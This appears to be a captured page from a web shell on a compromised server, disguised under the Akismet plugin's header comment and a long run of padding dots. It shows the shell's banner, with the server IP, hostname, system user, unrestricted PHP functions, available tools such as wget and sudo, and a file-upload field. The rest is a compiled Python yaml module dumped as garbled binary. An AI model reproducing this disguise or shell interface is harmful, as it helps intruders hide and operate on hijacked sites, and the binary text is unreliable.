#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
| Server IP : 62.109.13.187 / Your IP : 216.73.216.11 [ Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28 System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64 User : mosrembit ( 6064) PHP Version : 8.2.28 Disable Function : NONE Domains : 0 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /lib64/python2.7/site-packages/yaml/ |
Upload File : |
�
y�Mc @ s` d d g Z d d l m Z d d l Td d l Td e f d � � YZ d e f d � � YZ d S( t Composert
ComposerErrori����( t MarkedYAMLError( t *c B s e Z RS( ( t __name__t
__module__( ( ( s3 /usr/lib64/python2.7/site-packages/yaml/composer.pyR s c B sY e Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z d � Z
RS( c C s
i | _ d S( N( t anchors( t self( ( s3 /usr/lib64/python2.7/site-packages/yaml/composer.pyt __init__
s c C s* | j t � r | j � n | j t � S( N( t check_eventt StreamStartEventt get_eventt StreamEndEvent( R ( ( s3 /usr/lib64/python2.7/site-packages/yaml/composer.pyt
check_node s
c C s | j t � s | j � Sd S( N( R R t compose_document( R ( ( s3 /usr/lib64/python2.7/site-packages/yaml/composer.pyt get_node s c C su | j � d } | j t � s. | j � } n | j t � sg | j � } t d | j d | j � � n | j � | S( Ns( expected a single document in the streams but found another document( R t NoneR R R R t
start_mark( R t documentt event( ( s3 /usr/lib64/python2.7/site-packages/yaml/composer.pyt get_single_node s
c C s3 | j � | j d d � } | j � i | _ | S( N( R t compose_nodeR R ( R t node( ( s3 /usr/lib64/python2.7/site-packages/yaml/composer.pyR 2 s
c C sL | j t � rf | j � } | j } | | j k r[ t d d d | j d � | j � � n | j | S| j � } | j } | d k r� | | j k r� t d | j d � | j | j d | j � � q� n | j
| | � | j t � r� | j | � } nB | j t
� r| j | � } n! | j t � r>| j | � } n | j � | S( Ns found undefined alias %rs utf-8s* found duplicate anchor %r; first occurences second occurence( R t
AliasEventR t anchorR R R t encodeR t
peek_eventt descend_resolvert ScalarEventt compose_scalar_nodet SequenceStartEventt compose_sequence_nodet MappingStartEventt compose_mapping_nodet ascend_resolver( R t parentt indexR R R ( ( s3 /usr/lib64/python2.7/site-packages/yaml/composer.pyR ? s.
c C s� | j � } | j } | d k s- | d k rK | j t | j | j � } n t | | j | j | j d | j �} | d k r� | | j
| <n | S( Nu !t style( R t tagR t resolvet
ScalarNodet valuet implicitR t end_markR% R ( R R R R&